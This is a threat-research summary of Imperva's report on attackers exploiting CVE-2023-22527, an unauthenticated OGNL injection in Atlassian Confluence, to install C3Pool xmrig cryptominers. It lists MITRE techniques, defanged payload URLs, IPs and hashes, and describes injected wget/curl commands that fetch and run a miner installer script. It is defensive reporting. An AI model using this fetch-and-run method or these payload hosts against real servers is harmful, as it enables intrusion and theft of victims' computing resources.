Threat Research

Attackers Quick to Weaponize CVE-2023-22527 for Malware Delivery

admin

Imperva researchers found that CVE-2023-22527, an unauthenticated OGNL injection in Atlassian Confluence, was rapidly scanned and exploited to achieve remote code execution. Attackers used injected wget/bash commands to fetch and run C3Pool xmrig installer scripts, with known URLs and SHA-256 hashes observed. #CVE-2023-22527 #C3Pool

Keypoints

  • Atlassian disclosed CVE-2023-22527: an unauthenticated OGNL injection in Confluence Data Center/Server that enables arbitrary code execution.
  • Public PoCs and exploits appeared quickly, and researchers observed mass scanning and exploitation attempts (>620K attempts from ~2.8K IPs).
  • Observed exploitation included injected Wget commands that download and execute a C3Pool xmrig_setup installer (setup_c3pool_miner.sh and xmrig.tar.gz).
  • Multiple URLs and SHA-256 hashes tied to the miner were documented, plus additional URLs/IPs hosting malicious payloads.
  • The same wallet address tied to these drops has appeared in prior campaigns (e.g., Log4Shell exploitation), indicating reuse across campaigns.
  • Similar Confluence RCEs (CVE-2021-26084, CVE-2022-26134) were previously abused for cryptomining and botnet propagation.
  • Imperva Cloud WAF and WAF Gateway provide out-of-the-box protection against this vulnerability.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – CVE-2023-22527 is an unauthenticated OGNL injection in Confluence enabling remote code execution. (‘a critical vulnerability affecting Confluence Data Center and Confluence Server…an unauthenticated OGNL injection bug, allowing unauthenticated attackers to execute Java expressions…essentially enabling arbitrary code execution on the vulnerable server’)
  • [T1046] Network Service Scanning – Attackers performed large-scale scanning and exploitation attempts against Confluence instances. (‘mass scanning and attempted exploitation…with over 620K scanning and exploitation attempts from over 2.8K IPs’)
  • [T1059] Command and Scripting Interpreter – The OGNL payloads executed shell commands (e.g., wget) to retrieve and run miner installation scripts. (‘include Wget commands in the injected OGNL expression’)
  • [T1105] Ingress Tool Transfer – Payloads downloaded files from remote hosts (e.g., setup_c3pool_miner.sh, xmrig.tar.gz) to the compromised server. (‘the command will download a file from the url “hxxp://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh”’)
  • [T1496] Resource Hijacking – Compromised servers were used to run cryptomining software (xmrig) to mine Monero and consume victim compute resources. (‘designed to allow crypto enthusiasts to leverage available computing resources to mine currency’)

Indicators of Compromise

  • [URLs] payload distribution and installers – hxxp://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh, hxxp://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz, and other 5 URLs observed.
  • [SHA-256 Hashes] observed malicious binaries/scripts – 0bade474b812222dbb9114125465f9dd558e6368f155a6cd20ca352ddd20549e, 1785704767c1b3cff1c0414ac6be875a139a25054c306ce5da59c65fb52ad3b5, and 1 more hash.
  • [IP Addresses / Hosts] alternate payload hosts – 103.215.77.51:15679 (shx), 38.6.173.11 (multiple scripts/executables), used as drop/hosting points for additional payloads.

Technical summary: CVE-2023-22527 is an unauthenticated OGNL injection in Atlassian Confluence that allows attackers to evaluate Java expressions and achieve remote code execution on vulnerable servers. Public proof-of-concept exploits appeared quickly after disclosure, and researchers observed large-scale scanning followed by exploitation attempts that embed shell commands directly in the OGNL payload.

Exploitation procedure observed: attackers inject OGNL expressions that run wget/curl commands to fetch installer artifacts (notably setup_c3pool_miner.sh and xmrig.tar.gz) from remote hosts (examples: hxxp://download.c3pool.org/… and several IP-hosted URLs). The downloaded bash script is part of the C3Pool xmrig_setup framework; execution of that script installs and launches the xmrig Monero miner. Detected SHA-256 hashes for related files include 0bade474…549e and 17857047…3b5, with additional hashes and hosting URLs recorded.

Impact and operational notes: this pattern closely mirrors prior Confluence RCE abuses (CVE-2021-26084, CVE-2022-26134) where public exploits were used to deploy cryptominers and botnet components; operators also reused wallet addresses across campaigns. Defenders should block the known URLs/IPs, monitor for wget/curl spawned by Confluence processes, validate file hashes, and apply patches or WAF rules—Imperva Cloud WAF/WAF Gateway were noted to provide immediate protection.

Read more: https://www.imperva.com/blog/attackers-quick-to-weaponize-cve-2023-22527-for-malware-delivery/